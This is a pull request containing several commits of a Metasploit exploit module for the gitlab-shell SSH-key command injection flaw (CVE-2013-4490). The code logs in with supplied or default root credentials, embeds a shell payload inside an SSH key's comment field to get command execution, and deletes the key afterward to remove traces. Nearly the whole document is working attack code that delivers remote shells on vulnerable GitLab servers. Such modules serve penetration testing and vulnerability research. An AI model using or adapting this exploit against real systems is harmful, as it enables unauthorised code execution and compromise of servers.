### PR TITLE
Add gitlab-shell command injection module

### DIFF
--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -96,8 +96,16 @@ class Metasploit3 < Msf::Exploit::Remote
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
 
-    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+
+    if res.body.include? 'user[email]'
+      @gitlab_version = 5
+      user_field = 'user[email]'
+    else
+      @gitlab_version = 7
+      user_field = 'user[login]'
+    end
 
     # Perform the actual login and get the newly assigned session cookie
     res = send_request_cgi(
@@ -108,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote
                               {
                                 'utf8' => "\xE2\x9C\x93",
                                 'authenticity_token' => auth_token,
-                                'user[login]' => username,
+                                "#{user_field}" => username,
                                 'user[password]' => password,
                                 'user[remember_me]' => 0
                               }
@@ -116,18 +124,22 @@ class Metasploit3 < Msf::Exploit::Remote
 
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
 
-    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
+    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
   end
 
   def add_key(cmd)
-    add_key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+    if @gitlab_version == 5
+      @key_base = normalize_uri(datastore['TARGETURI'], 'keys')
+    else
+      @key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+    end
 
     # Perform an initial request to get an authenticity_token so the actual
     # key addition can be done successfully.
     res = send_request_cgi(
                             'method' => 'GET',
                             'cookie' => "request_method=GET; #{@session_cookie}",
-                            'uri'    => normalize_uri(add_key_base, 'new')
+                            'uri'    => normalize_uri(@key_base, 'new')
     )
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
@@ -149,7 +161,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi(
                             'method' => 'POST',
                             'cookie' => "request_method=GET; #{@session_cookie}",
-                            'uri'    => add_key_base,
+                            'uri'    => @key_base,
                             'vars_post' =>
                               {
                                 'utf8' => "\xE2\x9C\x93",
@@ -168,12 +180,10 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def delete_key(key_id)
-    key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
-
     res = send_request_cgi(
                              'method' => 'GET',
                              'cookie' => "request_method=GET; #{@session_cookie}",
-                             'uri'    => key_base
+                             'uri'    => @key_base
                            )
 
     fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
@@ -184,7 +194,7 @@ class Metasploit3 < Msf::Exploit::Remote
     res = send_request_cgi(
                              'method' => 'POST',
                              'cookie' => "#{@session_cookie}",
-                             'uri'    => normalize_uri("#{key_base}", "#{key_id}"),
+                             'uri'    => normalize_uri("#{@key_base}", "#{key_id}"),
                              'vars_post' =>
                              {
                                '_method' => 'delete',

--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -69,6 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    login
     if target.name == 'Unix (CMD)'
       execute_command(payload.encoded)
     else
@@ -77,15 +78,14 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    session_cookie = login
-    key_id = add_key(session_cookie, cmd)
-    delete_key(session_cookie, key_id)
+    key_id = add_key(cmd)
+    delete_key(key_id)
   end
 
   def login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-    signin_page = datastore['TARGETURI'] + 'users/sign_in'
+    signin_page = normalize_uri(datastore['TARGETURI'], 'users', 'sign_in')
 
     # Get a valid session cookie and authenticity_token for the next step
     res = send_request_cgi(
@@ -94,15 +94,15 @@ class Metasploit3 < Msf::Exploit::Remote
                             'uri'    => signin_page
     )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during login") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during login") unless res
 
-    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    local_session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
 
     # Perform the actual login and get the newly assigned session cookie
     res = send_request_cgi(
                             'method' => 'POST',
-                            'cookie' => session_cookie,
+                            'cookie' => local_session_cookie,
                             'uri'    => signin_page,
                             'vars_post' =>
                               {
@@ -116,23 +116,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
     fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
 
-    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
-
-    session_cookie
+    @session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
   end
 
-  def add_key(session_cookie, cmd)
-    add_key_base = datastore['TARGETURI'] + 'profile/keys'
+  def add_key(cmd)
+    add_key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
 
     # Perform an initial request to get an authenticity_token so the actual
     # key addition can be done successfully.
     res = send_request_cgi(
                             'method' => 'GET',
-                            'cookie' => "request_method=GET; #{session_cookie}",
-                            'uri'    => add_key_base + '/new'
+                            'cookie' => "request_method=GET; #{@session_cookie}",
+                            'uri'    => normalize_uri(add_key_base, 'new')
     )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
     title = rand_text_alphanumeric(16)
@@ -150,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     res = send_request_cgi(
                             'method' => 'POST',
-                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'cookie' => "request_method=GET; #{@session_cookie}",
                             'uri'    => add_key_base,
                             'vars_post' =>
                               {
@@ -161,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
                               }
                           )
 
-    fail_with(Failure::Unknown, "#{peer} - Request to add key failed") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     # Get the newly added key id so it can be used for cleanup
     key_id = res.headers['Location'].split('/')[-1]
@@ -169,24 +167,24 @@ class Metasploit3 < Msf::Exploit::Remote
     key_id
   end
 
-  def delete_key(session_cookie, key_id)
-    key_base = datastore['TARGETURI'] + 'profile/keys'
+  def delete_key(key_id)
+    key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
 
     res = send_request_cgi(
                              'method' => 'GET',
-                             'cookie' => "request_method=GET; #{session_cookie}",
+                             'cookie' => "request_method=GET; #{@session_cookie}",
                              'uri'    => key_base
                            )
 
-    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
 
     auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
 
     # Remove the key which was added to clean up after ourselves
     res = send_request_cgi(
                              'method' => 'POST',
-                             'cookie' => "#{session_cookie}",
-                             'uri'    => "#{key_base}/#{key_id}",
+                             'cookie' => "#{@session_cookie}",
+                             'uri'    => normalize_uri("#{key_base}", "#{key_id}"),
                              'vars_post' =>
                              {
                                '_method' => 'delete',
@@ -194,6 +192,6 @@ class Metasploit3 < Msf::Exploit::Remote
                              }
                            )
 
-    fail_with(Failure::Unknown, "#{peer} - Request to delete key failed") unless res
+    fail_with(Failure::TimeoutExpired, "#{peer} - Connection timed out during request") unless res
   end
 end

--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -1,0 +1,199 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'net/ssh'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Gitlab-shell Code Execution',
+      'Description'    => %q(
+          This module takes advantage of the addition of authorized
+          ssh keys in the gitlab-shell functionality of Gitlab. Versions
+          of gitlab-shell prior to 1.7.4 used the ssh key provided directly
+          in a system call resulting in a command injection vulnerability. As
+          this relies on adding an ssh key to an account valid credentials
+          are required to exploit this vulnerability.
+      ),
+      'Author'  =>
+        [
+          'Brandon Knight'
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://about.gitlab.com/2013/11/04/gitlab-ce-6-2-and-5-4-security-release/'],
+          ['CVE', '2013-4490']
+        ],
+      'Platform'  => 'linux',
+      'Targets'        =>
+        [
+          ['Linux', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86
+          }],
+          ['Linux (x64)', {
+            'Platform' => 'linux',
+            'Arch' => ARCH_X86_64
+          }],
+          ['Unix (CMD)', {
+            'Platform' => 'unix',
+            'Arch' => ARCH_CMD,
+            'Payload' =>
+                {
+                  'Compat'      => {
+                    'RequiredCmd' => 'perl python ruby openssl netcat'
+                  }
+                }
+
+          }]
+        ],
+      'CmdStagerFlavor' => %w( bourne printf ),
+      'DisclosureDate' => 'Nov 4 2013',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        OptString.new('USERNAME',  [true, 'The username to authenticate as', 'root']),
+        OptString.new('PASSWORD',  [true, 'The password for the specified username', '5iveL!fe']),
+        OptString.new('TARGETURI', [true,  'The path to Gitlab', '/'])
+      ], self.class)
+  end
+
+  def exploit
+    if target.name == 'Unix (CMD)'
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(temp: './', linemax: 2800)
+    end
+  end
+
+  def execute_command(cmd, _opts = {})
+    session_cookie = login
+    key_id = add_key(session_cookie, cmd)
+    delete_key(session_cookie, key_id)
+  end
+
+  def login
+    username = datastore['USERNAME']
+    password = datastore['PASSWORD']
+    signin_page = datastore['TARGETURI'] + 'users/sign_in'
+
+    # Get a valid session cookie and authenticity_token for the next step
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => 'request_method=GET',
+                            'uri'    => signin_page
+    )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during login") unless res
+
+    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0] || ''
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+
+    # Perform the actual login and get the newly assigned session cookie
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => session_cookie,
+                            'uri'    => signin_page,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                'user[login]' => username,
+                                'user[password]' => password,
+                                'user[remember_me]' => 0
+                              }
+                          )
+
+    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
+
+    session_cookie = res.get_cookies.scan(/(_gitlab_session=[a-z0-9]+)/).flatten[0]
+
+    session_cookie
+  end
+
+  def add_key(session_cookie, cmd)
+    add_key_base = datastore['TARGETURI'] + 'profile/keys'
+
+    # Perform an initial request to get an authenticity_token so the actual
+    # key addition can be done successfully.
+    res = send_request_cgi(
+                            'method' => 'GET',
+                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'uri'    => add_key_base + '/new'
+    )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<input name="authenticity_token" type="hidden" value="(.*?)"/).flatten[0]
+    title = rand_text_alphanumeric(16)
+    key_info = rand_text_alphanumeric(6)
+
+    # Generate a random ssh key
+    key = OpenSSL::PKey::RSA.new 2048
+    type = key.ssh_type
+    data = [key.to_blob].pack('m0')
+
+    openssh_format = "#{type} #{data}"
+
+    # Place the payload in to the key information to perform the command injection
+    key = "#{openssh_format} #{key_info}';#{cmd}; echo '"
+
+    res = send_request_cgi(
+                            'method' => 'POST',
+                            'cookie' => "request_method=GET; #{session_cookie}",
+                            'uri'    => add_key_base,
+                            'vars_post' =>
+                              {
+                                'utf8' => "\xE2\x9C\x93",
+                                'authenticity_token' => auth_token,
+                                'key[title]' => title,
+                                'key[key]' => key
+                              }
+                          )
+
+    fail_with(Failure::Unknown, "#{peer} - Request to add key failed") unless res
+
+    # Get the newly added key id so it can be used for cleanup
+    key_id = res.headers['Location'].split('/')[-1]
+
+    key_id
+  end
+
+  def delete_key(session_cookie, key_id)
+    key_base = datastore['TARGETURI'] + 'profile/keys'
+
+    res = send_request_cgi(
+                             'method' => 'GET',
+                             'cookie' => "request_method=GET; #{session_cookie}",
+                             'uri'    => key_base
+                           )
+
+    fail_with(Failure::Unknown, "#{peer} - Connection timed out during request") unless res
+
+    auth_token = res.body.scan(/<meta content="(.*?)" name="csrf-token"/).flatten[0]
+
+    # Remove the key which was added to clean up after ourselves
+    res = send_request_cgi(
+                             'method' => 'POST',
+                             'cookie' => "#{session_cookie}",
+                             'uri'    => "#{key_base}/#{key_id}",
+                             'vars_post' =>
+                             {
+                               '_method' => 'delete',
+                               'authenticity_token' => auth_token
+                             }
+                           )
+
+    fail_with(Failure::Unknown, "#{peer} - Request to delete key failed") unless res
+  end
+end

--- a/modules/exploits/multi/http/gitlab_shell_exec.rb
+++ b/modules/exploits/multi/http/gitlab_shell_exec.rb
@@ -50,10 +50,16 @@ class Metasploit3 < Msf::Exploit::Remote
             'Payload' =>
                 {
                   'Compat'      => {
-                    'RequiredCmd' => 'perl python ruby openssl netcat'
-                  }
+                    'RequiredCmd' => 'openssl perl python'
+                  },
+                  'BadChars' => "\x22"
                 }
 
+          }],
+          ['Python', {
+            'Platform' => 'python',
+            'Arch' => ARCH_PYTHON,
+            'Payload' => { 'BadChars' => "\x22" }
           }]
         ],
       'CmdStagerFlavor' => %w( bourne printf ),
@@ -70,9 +76,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def exploit
     login
-    if target.name == 'Unix (CMD)'
+    case target['Platform']
+    when 'unix'
       execute_command(payload.encoded)
-    else
+    when 'python'
+      execute_command("python -c \\\"#{payload.encoded}\\\"")
+    when 'linux'
       execute_cmdstager(temp: './', linemax: 2800)
     end
   end
@@ -82,10 +91,20 @@ class Metasploit3 < Msf::Exploit::Remote
     delete_key(key_id)
   end
 
+  def check
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path.to_s, 'users', 'sign_in'))
+    if res && res.body.include?('GitLab')
+      return Exploit::CheckCode::Detected
+    else
+      vprint_error("#{peer} - Connection timed out")
+      return Exploit::CheckCode::Unknown
+    end
+  end
+
   def login
     username = datastore['USERNAME']
     password = datastore['PASSWORD']
-    signin_page = normalize_uri(datastore['TARGETURI'], 'users', 'sign_in')
+    signin_page = normalize_uri(target_uri.path.to_s, 'users', 'sign_in')
 
     # Get a valid session cookie and authenticity_token for the next step
     res = send_request_cgi(
@@ -122,16 +141,16 @@ class Metasploit3 < Msf::Exploit::Remote
                               }
                           )
 
-    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res
+    fail_with(Failure::NoAccess, "#{peer} - Login failed") unless res && res.code == 302
 
     @session_cookie = res.get_cookies.scan(/(_gitlab_session=[A-Za-z0-9%-]+)/).flatten[0]
   end
 
   def add_key(cmd)
     if @gitlab_version == 5
-      @key_base = normalize_uri(datastore['TARGETURI'], 'keys')
+      @key_base = normalize_uri(target_uri.path.to_s, 'keys')
     else
-      @key_base = normalize_uri(datastore['TARGETURI'], 'profile', 'keys')
+      @key_base = normalize_uri(target_uri.path.to_s, 'profile', 'keys')
     end
 
     # Perform an initial request to get an authenticity_token so the actual


### PR DESCRIPTION
This request adds a module for gitlab-shell command
injection for versions prior to 1.7.4. This has been
tested by installing Gitlab version 7.1.1 on Ubuntu and then
using information at http://intelligentexploit.com/view-details.html?id=17746
to modify the version of gitlab-shell to a vulnerable one. This
was done as I could not find a better method for downloading
and deploying an older, vulnerable version of Gitlab.
